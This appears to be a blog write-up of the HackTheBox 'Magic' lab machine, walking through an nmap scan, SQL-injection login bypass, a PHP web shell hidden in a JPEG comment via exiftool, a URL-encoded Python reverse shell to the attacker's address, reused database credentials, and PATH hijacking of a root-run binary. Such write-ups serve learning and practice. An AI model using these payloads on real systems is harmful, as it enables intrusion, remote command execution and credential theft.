August 22, 2020 6 min to read

HackTheBox Magic Writeup

Hackthebox Magic Writeup.

Methodology

• Nmap scan
• SQL injection lead to Auth Bypass
• File upload && filter Bypass
• Privilege Escalation

Nmap Scan

as always, i did nmap scan to find out which servicecs was running in this machine, i found some important ports like 80 for Apache server and 22 for ssh.

nmap -sC -sV -Pn 10.10.10.185 -oA scan.txt

Nmap scan report for 10.10.10.185
Host is up (0.91s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
|_  256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Checking the Web-Page

• The webpage was very simple, it had a login page which you can get from the bottom of the page.

here’s the login the page.

SQL Injection

• Since we don’t know the username or password, let’s try SQL injection in both fields. The idea here is that the PHP code in the back may look something like this:

SELECT * FROM login WHERE username='$username' AND password='$password'

• If not properly sanitized, since we control the $username and $password variables, we could get the query to look like this:

SELECT * FROM login WHERE username='' OR 1=1;' AND password='$password'

To do so, we can supply ‘or 1=1 – as the username and something arbitrary. foo as the password.

• and here we go, i’m in.

File Upload with filter Bypass && Reverse shell@Magic

when i tried to upload php file to give me reverse shell it’s gave me an error, let’s see it.

• so we can upload images only. let’s do some magic with exiftool.

i will upload my reverse shell as a comment in image file. i’ll inject it with exiftool

PHP code: <?php echo “<pre>”; system($_GET[cmd]); ?>

exiftool -Comment=’<?php echo “<pre>”; system($_GET[cmd]); ?>’ hello.jpg

• nice, now let’s change the name of the image to hello.php.jpg

• let’s upload the photo now.

• uploaded successfully.

• now let’s navigate to : http://10.10.10.185/images/uploads/test.php.jpg?cmd=id

• done!, let’s get a reverse shell now.

open this: 10.10.10.185/images/uploads/test.php.jpg?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.xx.xx%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

• and start your nc listener.

Privilege Escalation » theseus

let’s navigate to /var/www/Magic and you will found db.php5 and this file contain the Database Credentials.

• i tried this password to login as theseus but didn’t work, so let’s read another file.

• there is another file its name dump.sql and this file contain the password of theseus.

• use this command : mysqldump -utheseus -piamkingtheseus -A » dump.sql and this will give us the same result.

• Username = Theseus
• Password = Th3s3usW4sK1ng

Theseus@Magic

• let’s change the user from www-data to theses

www-data@ubuntu:/var/www/Magic$ su theseus
su theseus
Password: Th3s3usW4sK1ng

theseus@ubuntu:/var/www/Magic$ 

user flag

Privilege Escalation » root

• after got a shell as theseus i uploaded the LinEnum script to do some enumeration and i found juicy info.

• here’s the interesting line

This binary is not a standard / default one that is included with Linux distributions, but it will run as root regardless of who executes it. Furthermore, since we are in the users group, we do have execution rights.

• if you type strings /bin/sysinfo. you will see this output.

popen() failed!
====================Hardware Info====================
lshw -short
====================Disk Info====================
fdisk -l
====================CPU Info====================
cat /proc/cpuinfo
====================MEM Usage=====================
free -h

So we will use the PATH Variable for exploiting the Binary we will set the new PATH as /tmp dir. and then i will use the cat binary to read root files.

• You can use any binary you want among the four of them

• Hardware Info = lshw -short
• Disk Info = fdisk -l
• CPU Info = cat /proc/cpuinfo

• MEM Usage = free -h

• let’s start

first make a dir in tmp directory » mkdir /tmp/xdevo

then make any file like devo.txt » touch devo.txt , this file will contain the output of the files which we will read.

echo -e ‘#!/bin/sh\ncat /root/root.txt » /tmp/xdevo/devo.txt’ > pwned

now make the pwned executable file » chmod +x pwned

export the PATH variable » export PATH=/tmp:$PATH or we can use this command PATH=.:$PATH /bin/sysinfo.

• now we can read any file we want.

root flag.

• cheers!